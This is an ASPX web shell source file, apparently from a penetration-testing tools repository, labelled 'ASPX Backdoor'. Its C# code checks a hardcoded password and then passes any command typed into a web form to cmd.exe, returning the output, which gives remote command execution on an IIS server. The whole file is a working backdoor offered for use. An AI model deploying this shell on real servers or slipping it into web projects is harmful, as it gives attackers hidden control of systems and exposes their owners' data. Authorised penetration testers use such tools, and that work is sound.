mgeeky-Penetration-Testing-.../web/webshell.aspx

108 lines
3.7 KiB
Plaintext
Raw Permalink Normal View History

2019-02-04 17:27:19 +01:00
<%@ Page Language="C#" Debug="false" Trace="false" %>
2019-02-04 17:11:11 +01:00
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
// =====================================================================
// Setup global password necessary to pass before using that webshell.
public string Password = "5eQzrXZHZwJNLvm6Q2b7PR6r";
// =====================================================================
void Page_Load(object sender, EventArgs e)
{
PasswordTextbox.Attributes["value"] = Request.Form["PasswordTextbox"];
PasswordTextbox.Attributes["type"] = "password";
PasswordTextbox.Text = Request.Form["PasswordTextbox"];
CommandTextbox.Value = Request.Form["CommandTextbox"];
}
2019-02-05 10:07:13 +01:00
string ExecuteCommand(string arg)
2019-02-04 17:11:11 +01:00
{
if (arg.Length >= 1)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c \""+ arg + "\"";
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
return "";
}
void Launch_OnClick(object sender, System.EventArgs e)
{
if (Request.Form["PasswordTextbox"] == Password)
{
2019-02-05 10:07:13 +01:00
string h = Server.HtmlEncode(ExecuteCommand("hostname")).Trim();
string u = Server.HtmlEncode(ExecuteCommand("whoami")).Trim();
2019-02-04 17:11:11 +01:00
Hostname.Text = u + "@" + h;
2019-02-05 10:07:13 +01:00
CommandOutput.InnerHtml = Server.HtmlEncode(ExecuteCommand(Request.Form["CommandTextbox"]));
2019-02-04 17:11:11 +01:00
}
else
{
Hostname.Text = "unknown";
CommandOutput.InnerHtml = "Wrong password provided.";
}
}
</script>
<!DOCTYPE html>
<html>
<head>
<title>ASPX Backdoor</title>
<script>
function setPassword()
{
document.getElementById("PasswordTextbox").type = 'password';
}
</script>
</head>
<body onload='setPassword()'>
<h3>ASPX Backdoor.</h3>
<i style="font-size:9px">You need to provide valid password in order to leverage RCE.</i>
<br/>
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
<br/>
<hr/>
<form id="cmd" method="post" runat="server">
<table style="width:100%">
<tr>
<td width="40%">
<b style="color:red">Password:</b>
</td>
<td width="60%">
<asp:TextBox runat='server' id="PasswordTextbox" style="width:30%"></asp:TextBox>
</td>
</tr>
<tr>
<td width="40%">
<b style="color:blue"></b>
<asp:Label id="Hostname" runat='server'></asp:Label>
</td>
<td width="60%">
2019-02-04 17:28:33 +01:00
<input type=text id="CommandTextbox" runat="server" value='' onClick="" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
2019-02-04 17:11:11 +01:00
</td>
</tr>
<tr>
<td width="40%">
</td>
<td width="60%">
<asp:Button id="Launch" runat="server" Text="Execute" OnClick="Launch_OnClick"></asp:Button>
</td>
</tr>
</table>
</form>
<hr />
<pre id="CommandOutput" runat='server' style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"></pre>
</body>
</html>